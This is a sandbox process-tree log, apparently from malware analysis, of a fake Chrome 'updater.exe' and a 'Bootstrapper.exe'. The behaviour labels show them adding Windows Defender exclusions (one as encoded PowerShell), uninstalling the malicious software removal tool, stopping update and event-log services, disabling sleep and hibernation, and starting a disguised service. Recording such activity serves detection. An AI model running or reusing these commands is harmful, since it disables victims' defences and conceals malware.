C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYgBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAcgB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAbQBpACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
PID:1608 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:1736
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:2616
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:4852
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:2108
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:1156
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:1540
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:3260
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3724
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:1752
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4776
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4108
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:3452
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:4180
-
-
-
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:3908
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4948
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1712
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:128
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2036
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1884
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4184
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4376
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4624
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:3752
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe5a5f3cb8,0x7ffe5a5f3cc8,0x7ffe5a5f3cd82⤵PID:2496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13724064866897825623,17231870367502957530,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1860 /prefetch:22⤵PID:2592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,13724064866897825623,17231870367502957530,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:32⤵PID:1928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xe4,0x10c,0x7ffe5a5f3cb8,0x7ffe5a5f3cc8,0x7ffe5a5f3cd82⤵PID:4932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1848 /prefetch:22⤵PID:876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 /prefetch:32⤵PID:4136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2528 /prefetch:82⤵PID:2968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:12⤵PID:1800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:12⤵PID:892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4356 /prefetch:12⤵PID:1400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:12⤵PID:1900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:12⤵PID:1868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:82⤵PID:4776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:82⤵PID:1316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:12⤵PID:1804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:12⤵PID:5088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:12⤵PID:1852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:12⤵PID:3180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:12⤵PID:3788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:12⤵PID:1700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:12⤵PID:2776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:12⤵PID:1036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:12⤵PID:2224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6296 /prefetch:82⤵PID:2304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:480
-
-
C:\Users\Admin\Downloads\ndp48-web.exe"C:\Users\Admin\Downloads\ndp48-web.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:768 -
C:\08f46da04e0ab5bc42\Setup.exeC:\08f46da04e0ab5bc42\\Setup.exe /x86 /x64 /web3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4156
-
-
-
C:\Users\Admin\Downloads\ndp48-web.exe"C:\Users\Admin\Downloads\ndp48-web.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3712 -
C:\c763fe32a8c32b9cf7386d070ccb6a3b\Setup.exeC:\c763fe32a8c32b9cf7386d070ccb6a3b\\Setup.exe /x86 /x64 /web3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2916
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:12⤵PID:1756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1232 /prefetch:12⤵PID:792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6728 /prefetch:12⤵PID:3864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6216 /prefetch:82⤵PID:1272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7072 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:3452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4896 /prefetch:22⤵PID:4012
-
-
C:\Users\Admin\Downloads\NDP481-Web.exe"C:\Users\Admin\Downloads\NDP481-Web.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1224 -
C:\5d9d887c49ae038aecf100a2eb79\Setup.exeC:\5d9d887c49ae038aecf100a2eb79\\Setup.exe /x86 /x64 /web3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2488 -
C:\5d9d887c49ae038aecf100a2eb79\SetupUtility.exeSetupUtility.exe /aupause4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2616
-
-
C:\5d9d887c49ae038aecf100a2eb79\SetupUtility.exeSetupUtility.exe /screboot4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1156
-
-
C:\Windows\system32\dism.exedism.exe /quiet /norestart /online /add-package /packagepath:"C:\5d9d887c49ae038aecf100a2eb79\Windows10.0-KB5011048-x64.cab"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3684 -
C:\Users\Admin\AppData\Local\Temp\3A0B4DCC-52C4-4C7A-BE8E-5F8D7E36B1CD\dismhost.exeC:\Users\Admin\AppData\Local\Temp\3A0B4DCC-52C4-4C7A-BE8E-5F8D7E36B1CD\dismhost.exe {7249E4DB-A52E-49A7-AFA1-4D4368856745}5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4612
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:12⤵PID:4012
-
-
C:\Users\Admin\Downloads\NDP481-Web.exe"C:\Users\Admin\Downloads\NDP481-Web.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3508 -
C:\23d1929be3b91af6d2933486\Setup.exeC:\23d1929be3b91af6d2933486\\Setup.exe /x86 /x64 /web3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
PID:4920 -
C:\23d1929be3b91af6d2933486\SetupUtility.exeSetupUtility.exe /aupause4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:828
-
-
C:\23d1929be3b91af6d2933486\SetupUtility.exeSetupUtility.exe /screboot4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3644
-
-
C:\Windows\system32\dism.exedism.exe /quiet /norestart /online /add-package /packagepath:"C:\23d1929be3b91af6d2933486\Windows10.0-KB5011048-x64.cab"4⤵PID:572
-
C:\Users\Admin\AppData\Local\Temp\CEE5C745-7DFB-4A73-BB70-55265AF513DE\dismhost.exeC:\Users\Admin\AppData\Local\Temp\CEE5C745-7DFB-4A73-BB70-55265AF513DE\dismhost.exe {2EBB4797-D775-4C97-94BF-2F3D70ACDA63}5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3644
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:12⤵PID:1804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3916 /prefetch:12⤵PID:1424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:12⤵PID:944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1920,6016490891721758786,8073842909873715399,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7292 /prefetch:82⤵PID:2808
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1508
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1376
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
PID:2856 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:1060
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:3816
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:1716
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4692
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:3372
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1276
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1520
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3100
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2180
-
-
